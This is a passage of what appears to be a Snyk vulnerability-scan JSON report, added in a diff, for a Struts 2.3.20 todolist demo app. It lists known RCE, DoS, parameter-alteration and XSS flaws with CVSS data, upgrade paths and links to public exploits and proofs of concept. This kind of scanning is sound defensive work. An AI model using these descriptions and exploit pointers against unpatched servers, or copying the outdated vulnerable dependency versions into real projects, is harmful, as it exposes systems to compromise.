"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source 
framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Exploit](https://www.exploit-db.com/exploits/49068)\n- [Proof Of Concept](https://github.com/PrinceFPF/CVE-2019-0230)\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-059)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml)\n", + "epssDetails": { + "percentile": "0.99361", + "probability": "0.95346", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0230" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:31:35.397242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:14:01Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:06:54Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.021057Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": 
"2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "credit": [ + "Takeshi Terada of Mitsui Bussan Secure Directions", + "Inc" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-060", + "title": "Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.403682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) 
is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n", + "epssDetails": { + "percentile": "0.95581", + "probability": "0.13147", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0233" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:39:32.053413Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:36:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:36:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:03.532706Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": 
"org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "title": "Unrestricted Upload of File with Dangerous Type", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/WW-5055", + "title": "Bug Report" + }, + { + "url": "https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:42.248460Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. 
A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n## References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n", + "epssDetails": { + "percentile": "0.60025", + "probability": "0.00216", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2012-1592" + ], + "CWE": [ + "CWE-434" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-09-04T15:56:51.451242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-12-05T15:43:54Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-09-04T15:56:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:53.807283Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "title": "Denial of Service", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew McClain" + ], + "semver": { + "vulnerable": [ + "[,2.5.32)", + "[6.0.0,6.1.2.2)", + "[6.2.0,6.3.0.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": 
[ + "2.5.32", + "6.1.2.2", + "6.3.0.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-065", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:27.113057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "description": "## 
Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n", + "epssDetails": { + "percentile": "0.66400", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-41835" + ], + "CWE": [ + "CWE-400" + ], + "GHSA": [ + "GHSA-729q-fcgp-r5xh" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-06T07:04:16.630936Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-05T09:33:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-06T08:01:07.098280Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:10.404666Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + 
"from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6102825", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Steven Seeley" + ], + "semver": { + "vulnerable": [ + "[,2.5.33)", + "[6.0.0,6.3.0.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.33", + "6.3.0.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj", + "title": "Apache Mailing List" + }, + { + "url": "https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts", + "title": "Exploitation Attempts" + }, + { + "url": "https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-066", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 
9.8, + "modificationTime": "2024-03-11T09:54:10.688470Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-07-23T07:46:17.121104Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.688470Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via manipulation of file upload parameters that enable path traversal. 
Under certain conditions, uploading of a malicious file is possible, which may then be executed on the server.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.33, 6.3.0.2 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj)\n- [Exploitation Attempts](https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts)\n- [GitHub Commit](https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163)\n- [GitHub Commit](https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6)\n- [PoC](https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-066)\n", + "epssDetails": { + "percentile": "0.94639", + "probability": "0.09044", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-50164" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-07T11:44:29.902168Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-07T09:45:05Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-07T12:27:32.361011Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-23T07:46:17.121104Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.33" + ], + "isUpgradable": true, + "isPatchable": false, + 
"name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "title": "Parameter Alteration", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "rskvp93" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-026.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:10.273105Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. ValueStack defines special top object which represents root of execution context. 
It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-235" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.673000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-09-28T16:59:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-09-28T16:59:30Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + 
"malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.122257Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. 
It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n", + "epssDetails": { + "percentile": "0.88004", + "probability": "0.01731", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-0785" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.686000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T05:58:06Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T05:58:06Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:29.964282Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.25)" + ] + }, 
+ "exploit": "Not Defined", + "fixedIn": [ + "2.3.25" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/fc2179cf1ac9fbfb61e3430fa88b641d87253327", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:24.610273Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without 
validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
